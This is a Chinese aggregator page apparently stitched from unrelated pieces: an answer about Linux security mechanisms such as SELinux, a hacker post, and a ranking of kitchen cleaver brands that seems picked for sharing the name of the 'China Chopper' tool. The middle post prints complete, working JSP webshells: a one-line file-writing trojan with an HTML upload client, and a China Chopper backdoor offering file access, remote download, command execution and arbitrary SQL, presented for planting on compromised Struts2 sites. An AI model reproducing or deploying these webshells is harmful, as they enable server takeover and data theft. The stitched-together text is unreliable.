LINUX真的很安全吗?

LINUX真的很安全吗?,第1张

题主说的Linux安全,应该指的是Linux *** 作系统的本身的安全吧。这个范围比较广,包括Linux内核层的安全与用户层的安全。用户层的安全包括Linux下的各种认证系统,比如目前流行的PAM认证机制,Ukey指纹认证机制,远程网络认证机制,LDAP认证机制,3A认证机制等。用户层安全还包括网络安全,比如通过iptables定制防火墙,关闭服务器不必要开启的端口等。内核态的安全,比如,缓冲区溢出攻击,当然这个安全漏洞在windows中也是存在的,各种各样的内核态提权漏洞等,现在有很多网络安全公司基于netfilter框架添加自已的勾子函数, 生产各种入侵检测系统等。

Linux系统安全之所以在互联网公司包括像阿里巴巴这样的公司不受重视,是因为这些公司觉得,做为暴露给用户的各种应用,如Web应用等,这些应用的安全显然比 *** 作系统的安全来得更加重要。当应用的安全得不到保障,Web程序被各种脚本小子植入如存储型XSS脚本,导致用户密码被盗,甚至导致一些更严重的结果,比如存储用户名与密码的数据库被脱库,这个就是相当严重的安全事故了。也许这个破坏者完成这些 *** 作,并不需要利用 *** 作系统的漏洞,也不需要取得 *** 作系统的用户名和密码,只是要取得一个具有较高权限的数据库管理员的密码即可完成上述 *** 作。当黑客取得Linux系统的普通用户名与密码时,当他需要root用户时,才会去利用 *** 作系统本身的漏洞进行提权。关于Linux *** 作系统提权漏洞,在2.6.18版本存在较多的提权漏洞,到了2.6.32内核,这种提权漏洞已经少了很多。

回到正题,对于现在的很多IT从业人员来说,前途最直接的体现就是工资,待遇。就目前国内来说,直接从事Linux *** 作系统安全的公司很少,大部分都是科研院校在做这方面的工作。比如中科院下属的一些研究所,国家电网、南方电网里面的研究院,当然还有各大高校的一些信息安全实验室,还有解放军叔叔,他们也在从事这些方面的工作。

当然,如同所有的IT技术一样,Linux *** 作系统的各种安全机制,也是国外在主导。现有的Linux安全框架叫做LSM,Linux security module。基于这个框架,可以实现各种各样的Linux安全机制,其中最著名的就是SELinux。因为Redhat的Linux自带的安全模块就是SELinux。SELinux最早是由NSA(美国国家安全局)主导的项目,后面开源了。Redhat在SELinux上做了大量的工作。但SELinux由于其配置比较复杂,再加上许多人认为Linux系统本身已经足够安全了,所以大部分人都将SELinux设置了disabled。想了解更多Linux命令,可查看《Linux命令大全》,具体搜索方式看下图:

相信用过一句话木马的黑阔们对中国菜刀这个程序不会感到陌生,小弟也曾使用PHP一句话木马轻松lcx了很多站。近期Struts2重定向漏洞疯狂来袭,不少黑阔们都摩拳擦掌、争先恐后的寻找属于自己的那群“小肉鸡”。由于工作需要,我也对几个站点做了Struts2重定向漏洞的测试,所有使用Struts2框架的网站安全问题均不容乐观,中标率几乎达到了85%以上。也许一场血雨腥风的Struts2漏洞利用潮即将来临。说了这么多废话,本文的目的是什么呢?其实只是想记录一下JSP几种后门代码啦,因为曾经找JSP菜刀马找的老辛苦了。1、首先是JSP一句话木马和它的客户端小伙伴。(小伙伴们都惊呆了~~~)以下是服务端,保存成one.jsp并上传至目标服务器中。<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%>通过使用一句话木马客户端连接one.jsp木马。将下列代码保存为html页面:<html><head><title>JSP一句话木马客户端</title></head><div align=center> <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text> <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.valueget.submit()" value=提交></form> <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes())%> </textarea> </div></body>保存完成后,打开html页面,写入一句话木马服务端地址,例如http://www.cto365.com/one.jsp,写入需要的代码和保存的文件名称点击保存即可。 2、中国菜刀能用的菜刀马本文除了对jsp一句话木马进行了说明,还提供了一个中国菜刀能用的菜刀马。将下列代码保存为xx.jsp并上传至目标服务器,使用中国菜刀工具进行连接。<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%><%!String Pwd="cto365.com"String EC(String s,String c)throws Exception{return s}//new String(s.getBytes("ISO-8859-1"),c)}Connection GC(String s)throws Exception{String[] x=s.trim().split("rn")Class.forName(x[0].trim()).newInstance()Connection c=DriverManager.getConnection(x[1].trim())if(x.length>2){c.setCatalog(x[2].trim())}return c}void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots()for(int i=0i<r.lengthi++){sb.append(r[i].toString().substring(0,2))}}void BB(String s,StringBuffer sb)throws Exception{File oF=new File(s),l[]=oF.listFiles()String sT, sQ,sF=""java.util.Date dtSimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")for(int i=0i<l.lengthi++){dt=new java.util.Date(l[i].lastModified())sT=fm.format(dt)sQ=l[i].canRead()?"R":""sQ+=l[i].canWrite()?" W":""if(l[i].isDirectory()){sb.append(l[i].getName()+"/t"+sT+"t"+l[i].length()+"t"+sQ+"n")}else{sF+=l[i].getName()+"t"+sT+"t"+l[i].length()+"t"+sQ+"n"}}sb.append(sF)}void EE(String s)throws Exception{File f=new File(s)if(f.isDirectory()){File x[]=f.listFiles()for(int k=0k<x.lengthk++){if(!x[k].delete()){EE(x[k].getPath())}}}f.delete()}void FF(String s,HttpServletResponse r)throws Exception{int nbyte[] b=new byte[512]r.reset()ServletOutputStream os=r.getOutputStream()BufferedInputStream is=new BufferedInputStream(new FileInputStream(s))os.write(("->"+"|").getBytes(),0,3)while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.write(("|"+"<-").getBytes(),0,3)os.close()is.close()}void GG(String s, String d)throws Exception{String h="0123456789ABCDEF"int nFile f=new File(s)f.createNewFile()FileOutputStream os=new FileOutputStream(f)for(int i=0i<d.length()i+=2){os.write((h.indexOf(d.charAt(i))<<4|h.indexOf(d.charAt(i+1))))}os.close()}void HH(String s,String d)throws Exception{File sf=new File(s),df=new File(d)if(sf.isDirectory()){if(!df.exists()){df.mkdir()}File z[]=sf.listFiles()for(int j=0j<z.lengthj++){HH(s+"/"+z[j].getName(),d+"/"+z[j].getName())}}else{FileInputStream is=new FileInputStream(sf)FileOutputStream os=new FileOutputStream(df)int nbyte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}is.close()os.close()}}void II(String s,String d)throws Exception{File sf=new File(s),df=new File(d)sf.renameTo(df)}void JJ(String s)throws Exception{File f=new File(s)f.mkdir()}void KK(String s,String t)throws Exception{File f=new File(s)SimpleDateFormat fm=new SimpleDateFormat("yyyy-MM-dd HH:mm:ss")java.util.Date dt=fm.parse(t)f.setLastModified(dt.getTime())}void LL(String s, String d)throws Exception{URL u=new URL(s)int nFileOutputStream os=new FileOutputStream(d)HttpURLConnection h=(HttpURLConnection)u.openConnection()InputStream is=h.getInputStream()byte[] b=new byte[512]while((n=is.read(b,0,512))!=-1){os.write(b,0,n)}os.close()is.close()h.disconnect()}void MM(InputStream is, StringBuffer sb)throws Exception{String lBufferedReader br=new BufferedReader(new InputStreamReader(is))while((l=br.readLine())!=null){sb.append(l+"rn")}}void NN(String s,StringBuffer sb)throws Exception{Connection c=GC(s)ResultSet r=c.getMetaData().getCatalogs()while(r.next()){sb.append(r.getString(1)+"t")}r.close()c.close()}void OO(String s,StringBuffer sb)throws Exception{Connection c=GC(s)String[] t={"TABLE"}ResultSet r=c.getMetaData().getTables (null,null,"%",t)while(r.next()){sb.append(r.getString("TABLE_NAME")+"t")}r.close()c.close()}void PP(String s,StringBuffer sb)throws Exception{String[] x=s.trim().split("rn")Connection c=GC(s)Statement m=c.createStatement(1005,1007)ResultSet r=m.executeQuery("select * from "+x[3])ResultSetMetaData d=r.getMetaData()for(int i=1i<=d.getColumnCount()i++){sb.append(d.getColumnName(i)+" ("+d.getColumnTypeName(i)+")t")}r.close()m.close()c.close()}void QQ(String cs,String s,String q,StringBuffer sb)throws Exception{int iConnection c=GC(s)Statement m=c.createStatement(1005,1008)try{ResultSet r=m.executeQuery(q)ResultSetMetaData d=r.getMetaData()int n=d.getColumnCount()for(i=1i<=ni++){sb.append(d.getColumnName(i)+"t|t")}sb.append("rn")while(r.next()){for(i=1i<=ni++){sb.append(EC(r.getString(i),cs)+"t|t")}sb.append("rn")}r.close()}catch(Exception e){sb.append("Resultt|trn")try{m.executeUpdate(q)sb.append("Execute Successfully!t|trn")}catch(Exception ee){sb.append(ee.toString()+"t|trn")}}m.close()c.close()}%><%String cs=request.getParameter("z0")+""request.setCharacterEncoding(cs)response.setContentType("text/htmlcharset="+cs)String Z=EC(request.getParameter(Pwd)+"",cs)String z1=EC(request.getParameter("z1")+"",cs)String z2=EC(request.getParameter("z2")+"",cs)StringBuffer sb=new StringBuffer("")try{sb.append("->"+"|")if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent()sb.append(s+"t")if(!s.substring(0,1).equals("/")){AA(sb)}}else if(Z.equals("B")){BB(z1,sb)}else if(Z.equals("C")){String l=""BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))))while((l=br.readLine())!=null){sb.append(l+"rn")}br.close()}else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))))bw.write(z2)bw.close()sb.append("1")}else if(Z.equals("E")){EE(z1)sb.append("1")}else if(Z.equals("F")){FF(z1,response)}else if(Z.equals("G")){GG(z1,z2)sb.append("1")}else if(Z.equals("H")){HH(z1,z2)sb.append("1")}else if(Z.equals("I")){II(z1,z2)sb.append("1")}else if(Z.equals("J")){JJ(z1)sb.append("1")}else if(Z.equals("K")){KK(z1,z2)sb.append("1")}else if(Z.equals("L")){LL(z1,z2)sb.append("1")}else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2}Process p=Runtime.getRuntime().exec(c)MM(p.getInputStream(),sb)MM(p.getErrorStream(),sb)}else if(Z.equals("N")){NN(z1,sb)}else if(Z.equals("O")){OO(z1,sb)}else if(Z.equals("P")){PP(z1,sb)}else if(Z.equals("Q")){QQ(cs,z1,z2,sb)}}catch(Exception e){sb.append("ERROR"+":// "+e.toString())}sb.append("|"+"<-")out.print(sb.toString())%>

中国菜刀排名前十:

1、张小泉:如今网络最流行的不能拍蒜的菜刀,成名较早,1628年就出现了,是刀剪品牌中唯一的驰名商标。经过拍蒜事件后,估计张小泉会被冷落一段时间了。

2、十八子:小编用的就是十八子,感觉还不错,菜刀不太重。十八子是由李字拆字后得名,起源于广东阳江,成立于1983年。

3、双立人:德国品牌,以双子座作为最初的构想,外观漂亮做工精致。双立人是最古老的商标之一,在德国小镇索林根创立。

4、王麻子:借助拍蒜事件,王麻子来了个网络营销,但效果一般。王麻子创于1651年,是中华老字号,锻制技艺为国家级非物质文化遗产名录。

5、苏泊尔:借助炊具的畅销,苏泊尔也推出了更多的产品,苏泊尔的刀具手感不错,剪刀也比较好。

6、拓菜刀:成立于1997年,专业生产厨房刀具等五金用品,这个品牌知名度低一些。

7、邓家刀:重庆邓氏厨具制造有限公司的专业制造传统手工锻打厨房刀具的品牌,是重庆市老字号。

8、九阳菜刀:从豆浆机走出来的九阳也开拓了厨具用品,属于中规中矩吧。

9、爱仕达:爱仕达创建于1978年,产品线较长,炊具、厨房小家电、汽车零部件等。

10、拜格:厨房用品品种齐全,是网络上一个知名度较高的品牌。


欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/yw/8286308.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2023-04-15
下一篇 2023-04-15

发表评论

登录后才能评论

评论列表(0条)

保存